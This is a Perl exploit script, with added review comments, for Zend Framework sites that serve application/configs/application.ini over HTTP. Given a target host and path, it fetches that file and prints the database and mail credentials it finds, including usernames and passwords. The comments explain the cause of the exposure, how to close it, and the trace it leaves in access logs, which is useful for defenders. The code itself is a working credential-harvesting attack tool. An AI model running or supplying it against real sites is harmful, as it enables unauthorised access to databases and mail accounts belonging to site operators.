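#!/usr/bin/perl
# Zend Framework Exploit.
# By KoubackTr
# koubacktr@gmail.com
# https://koubacktr.wordpress.com/
#=====================================================================#
# This script exploits a vulnerability in the Zend Framework          #
# Through the exposure of the configuration file "application.ini"    #
#=====================================================================#
# Status: In test and adaptation
#
# What the code does: it requests
#   http://<target>/<zend/path>/application/configs/application.ini
# and, when the server answers with a success status, prints the lines of
# that file that hold database and mail settings.
#
# Defensive reading: the file is only reachable over HTTP when the
# application/ directory sits under the web server's document root.
# Serving only the public/ directory (or denying requests for
# application/ and *.ini) closes the exposure; credentials from a file
# that was reachable should be rotated. Requests for
# .../application/configs/application.ini in access logs are the trace
# this check leaves behind.

# Libs
use strict;
use warnings;
use LWP::UserAgent;
use Getopt::Long;
use Config;
use Term::ANSIColor;

# Return every line of $body that matches $pattern, each terminated by a
# newline (empty string when nothing matches). This replaces the original
# `curl -s "$URL" | grep ...` backticks, which interpolated command-line
# input into a shell command and re-downloaded the file for every key.
sub _matching_lines {
    my ($body, $pattern) = @_;
    return join q{}, map { "$_\n" } grep { $_ =~ $pattern } split /\r?\n/, $body;
}

# Platform guard. The original compared with `==`, which numifies both
# strings to 0, so the check always passed; `ne` is the string comparison
# the message below describes.
my $os = $Config{osname};
if ($os ne 'linux') {
    print "Ohh, this software run only in linux systems. [DIE]\n";
    die;
}

print color('bold cyan');
print '
__________ .___ ____ ___ .__ ____ __
\____ /____ ____ __| _/ ____ \ \/ /_____ | | ____/_ |/ |_
/ // __ \ / \ / __ | _/ __ \ \ /\____ \| | / _ \| \ __\
/ /\ ___/| | \/ /_/ | \ ___/ / \| |_> > |_( <_> ) || |
/_______ \___ >___| /\____ | \___ >___/\ \ __/|____/\____/|___||__|
\/ \/ \/ \/ \/ \_/__|
by KoubackTr || https://koubacktr.wordpress.com/
';
print color('reset');

# Command line: -t <target host>, -p <path of the Zend application>.
my ($target, $zend_path);
GetOptions(
    't=s' => \$target,
    'p=s' => \$zend_path,
);

unless ($target) {
    print color('yellow');
    print "\t\t\t[!] Please, set a Zend target!\n";
    print "\t\t\tUse EX: $0 -t <target> -p <zend/path/>\n\n";
    # Reset the colour before leaving; the original placed this after
    # `exit`, where it never ran and left the terminal yellow.
    print color('reset');
    exit;
}

# Default the path to the site root. The original declared a second,
# block-scoped `my $zend_path` here, so the default never took effect.
unless ($zend_path) {
    $zend_path = '/';
}

my $APP  = 'application.ini';
my $PATH = 'application/configs';

# Build the URL from non-empty path segments so that a leading, trailing
# or missing slash in -t / -p does not produce "//" runs.
(my $host = $target) =~ s{/+\z}{};
my $URL = join '/', "http://$host",
    grep { length } ( split( m{/+}, $zend_path ), $PATH, $APP );

my $ua       = LWP::UserAgent->new;
my $response = $ua->get($URL);

# NOTE(review): a success status alone does not prove the file is exposed;
# a site that answers 200 with a custom error page also lands in this
# branch, in which case the listings below simply come out empty.
if ($response->is_success) {
    print color('red');
    print "\t\t\t[+] TARGET IS VULNERABLE !! :)\n";
    print color('reset');
    print "\t\t\t[+] EXPLORE DB CONFIG IN FILE... !! :)\n\n";

    # Reuse the body already fetched above instead of shelling out.
    my $body = $response->decoded_content;
    $body = $response->content unless defined $body;

    # The patterns are kept exactly as the original grep expressions, so
    # an unescaped "." still matches any character.
    my $db_host    = _matching_lines($body, qr/db.params.host/);
    my $db_adapter = _matching_lines($body, qr/db.adapter/);
    my $db_user    = _matching_lines($body, qr/.db.params.username/);
    my $db_pass    = _matching_lines($body, qr/.db.params.password/);
    my $db_name    = _matching_lines($body, qr/db.params.dbname/);
    my $db_general = _matching_lines($body, qr/connection_string/);

    # The lines printed here include credentials verbatim; captured
    # output and terminal scrollback are sensitive from this point on.
    print color('cyan');
    print "\t$db_adapter \n";
    print "\t$db_host \n";
    print "\t$db_user \n";
    print "\t$db_pass \n";
    print "\t$db_name \n";
    print "\n$db_general \n";
    print color('reset');
    print "\n";

    print "\t\t\t[+] EXPLORE MAIL CONFIG IN FILE... !! :)\n\n";
    my $mail_type = _matching_lines($body, qr/mail.transport.type/);
    my $mail_host = _matching_lines($body, qr/mail.transport.host/);
    my $mail_port = _matching_lines($body, qr/mail.transport.port/);
    my $mail_user = _matching_lines($body, qr/.mail.transport.username/);
    my $mail_pass = _matching_lines($body, qr/mail.transport.password/);

    print color('cyan');
    print "\t$mail_type \n";
    print "\t$mail_host \n";
    print "\t$mail_port \n";
    print "\t$mail_user \n";
    print "\t$mail_pass \n";
    print color('reset');
    print "\n\n END!\n";
}
else {
    # The request did not succeed: the file was not served at this URL.
    print color('bold green');
    print "\t\t\t\n[!] TARGET IS NOT VULNERABLE😦 (BYE)\n\n";
    print color('reset');
}
# END #
#
# KoubackTr - 2014 http://twitter.com/kouback_tr_
# irc.anonnet.org 6667 #Loc
#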